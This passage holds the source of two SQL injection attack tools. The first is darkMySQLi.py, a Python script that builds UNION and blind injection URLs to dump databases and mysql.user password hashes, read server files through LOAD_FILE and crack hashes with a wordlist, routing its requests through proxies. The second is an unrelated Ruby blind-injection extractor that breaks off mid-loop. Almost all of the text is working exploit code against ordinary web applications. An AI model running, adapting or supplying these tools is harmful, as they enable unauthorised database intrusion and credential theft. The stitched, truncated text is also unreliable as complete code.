lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. -D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. ;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table if arg_where != "" or arg_orderby != "": if arg_where != "": arg_where = arg_where.split(",") print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\"" arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex") if arg_orderby != "": arg_orderby = "ORDER+BY+'"+arg_orderby+"'" print "[+] ORDERBY clause:",arg_orderby count_URL += "+"+arg_where line_URL += "+"+arg_where+"+"+arg_orderby if version[0] == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") if arg_blind == "--blind": count_URL = site+"+and+((SELECT+COUNT(schema_name)" count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+schema_name" line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") else: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex") arg_row = "Databases" if arg_blind == "--blind": count_URL+="))" line_URL+="+LIMIT+" else: count_URL += arg_end line_URL += "+LIMIT+NUM,1"+arg_end ## Blind Info --- I know it doesnt make sence where this code is.. but.. fuck it... if mode == "--info" and arg_blind == "--blind": head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) print "\n[+] Showing database version, username@location, and database name!" file.write("\n\n[+] Showing database version, username@location, and database name!") line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database()))," row_value = 1 #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": if arg_blind == "--blind": row_value = GuessValue(count_URL) else: source = GetThatShit(count_URL) match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ## UNION Schema Enumeration and DataExt loop if arg_blind == "--union": if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full": while int(table_num) != int(row_value): try: source = GetThatShit(line_URL.replace("NUM",str(num))) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] if table_num == 0: print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n") else: print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n") print "[Table: Columns]";file.write("[Table: Columns]\n") if cur_table != match[1]: print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2]) cur_table = match[1] #table_num+=1 table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] if table_num == 0: print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) else: print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match)) table_num+=1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+.+\x1e\x1e",source) if match == []: match = [''] else: match = match[0].strip("\x1e").split("\x1e") if arg_rowdisp == 1: print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",) else: print;file.write("\n") for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num+=1 else: if mode == "--dump": table_num+=1 sys.stdout.write("\n[%s] No data" % (num)) file.write("\n[%s] No data" % (num)) break num+=1 except (KeyboardInterrupt, SystemExit): raise except: pass ## Blind Schema Enumeration and DataExt loop if arg_blind == "--blind": if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info": lower_bound = 0 upper_bound = 127 print for data_row in range(int(num), row_value): sys.stdout.write("[%s]: " % (lim_num)) file.write("\n[%s]: " % (lim_num)) sys.stdout.flush() value = chr(upper_bound) while value != chr(0): if mode == "--info": Guess_URL = line_URL + str(let_pos)+",1))" else: Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))" value = chr(GuessValue(Guess_URL)) sys.stdout.write("%s" % (value)) file.write(value) sys.stdout.flush() let_pos+=1 print lim_num = int(lim_num) + 1 let_pos = 1 data_row+=1 #Lets wrap it up! if mode == "--schema" or mode == "--full" or mode == "--dump": print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) else: print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close()

#MySQL Blind Inyection Tool #Coder => SH4V #n3t-datagrams.net require 'net/http' puts "host:" host=gets.chomp puts "extension:" ext=gets.chomp puts "columna:" col=gets.chomp puts "tabla:" tab= gets.chomp num="0" url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body corp2=http.get("#{url}333") corp2=corp2.body lon1=corp1.length lon2=corp2.length while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 